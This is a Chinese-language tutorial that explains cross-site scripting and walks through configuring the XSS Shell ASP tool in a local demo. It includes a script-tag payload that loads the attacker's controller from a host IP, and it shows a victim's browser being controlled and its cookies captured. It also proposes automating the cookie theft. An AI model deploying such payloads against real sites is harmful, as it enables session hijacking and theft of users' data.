跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。攻击者通常会在有漏洞的程序中插入JavaScript、VBScript、ActiveX或Flash以欺骗用户。
并非任何可利用脚本插入实现攻击的漏洞都被称为XSS,比如说,你alert一个窗口并不表示就存在XSS漏洞。真正的XSS应该称作Script injection,只有能把我们插入的脚本保存在被修改的远程WEB页面里,才能有利用价值。攻击者通常会在有漏洞的程序中插入JavaScript、VBScript、ActiveX或Flash以欺骗用户
---------------------
演示题目:XSS 攻击
利用工具:Xss shell
辅助工具:Aws
---------------------
by no7oor
Xss shell 是一款ASP的xss攻击工具,需要在支持ASP的服务上运行。被攻击的页面会显示在xss shell里,并可以对其进行远程操作
注意:所有演示都是在本地完成的。
1、搭建Xss Shell 运行环境
a、配置AWS 服务器。AWS服务是一个简单的ASP服务器,配置很简单,把ASP文件放在AWS同一目录下即可
2、配置XSS SHELL
配置前先说一下,xss shell的结构
db\shell.mdb 是用来存放通过xss漏洞采集到的信息的数据库 。
sample_victim\default.asp 是一个存在xss漏洞的页面,并嵌入了准备好的脚本 为了输入方便,我改成xssbug
这个default.asp 其实就是存在xss漏洞的页面,这里只是构造了一个演示。
xssshell\下面的文件是控制端 这一部份放在asp服务器上。
xssshell.asp 是主要的功能程序
a、修改xssshell.asp文件 var SERVER = "http://attacker/"; 把attacker 改成xssshell存放的ip
b、修改db.asp文件
c、修改演示页面default.asp文件 也就是嵌入脚本
<script src="http://192.168.1.19/xssshell.asp?v=336699"></script> 关键代码。这个就是xss的脚本利用代码了
3、观看效果
这个页面就是控制端了,在这里可以看到打开了有xss漏洞页面的机器上线,我们来测试一下看看。
OK 上线了…… 这时我们就可以对它进行操作了。因为这个xssshell并不是功能完整的,我也就测试一下抓取cookies。
给对方发送了一个message页面。
也抓取到了cookies。
一但对方关闭有xss漏洞的页面,那么对方也就下线了。。。。
4、注意事项
a、Web服务器port最好为80端口
b、Xss Shell数据库DBPATH = "..\db\shell.mdb" 的路径最好是相对路径
5、总结
Xss shell 这款工具只能对打开漏洞页面并不关闭的情况下,才可以对其进行操作,一但关闭页面,随之也就下线,不能对其操作了。应该还可以增强此功能,比如增加自动采集cookies 一但对方上线,实现立刻抓取cookies并保存到指定位置,这样这款工具就更具备智能化,更加有实用价值。另外,我这次演示的版本,还有一些功能并没有实现。应该可以完善。
只要一个电话
我们免费为您回电